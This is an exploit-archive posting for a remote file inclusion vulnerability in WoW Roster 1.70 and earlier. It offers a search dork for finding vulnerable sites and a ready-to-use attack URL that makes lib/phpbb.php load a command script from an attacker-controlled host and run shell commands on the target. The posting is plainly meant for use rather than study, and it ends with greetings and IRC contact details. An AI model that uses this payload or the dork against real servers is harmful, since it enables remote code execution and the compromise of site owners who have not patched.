[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WoW Roster <= 1.70 (/lib/phpbb.php) Remote File Include Vulnerability
# Published : 2006-08-02
# Author : |peti
# Previous Title : SendCard <= 3.4.0 Unauthorized Administrative Access Exploit
# Next Title : TWiki <= 4.0.4 (Configure Script) Remote Code Execution Exploit (meta)
--------------------------------------------------------------------------------
Title : WoW Roster (/lib/phpbb.php) Remote File Include Vulnerability
--------------------------------------------------------------------------------
Affected software description :
Application : World of Warcraft (WoW) Roster
URL : http://www.wowroster.net/
--------------------------------------------------------------------------------
dork : "wow roster version 1.*"
Exploit :
--------------------------------------------------------------------------------
Usage:
http://[target]/[roster_path]/lib/phpbb.php?subdir=http://[evilhost]/cmd.txt?&cmd=ls
--------------------------------------------------------------------------------
greets:
XLR, rdy, wiggle, phreek, menx [...]
special greet: my old gf ;)
--------------------------------------------------------------------------------
Contact:
Nick: |peti on irc.quakenet.org/irc.efnet.net
--------------------------------- [ eof ] --------------------------------------
# www.Syue.com [2006-08-02]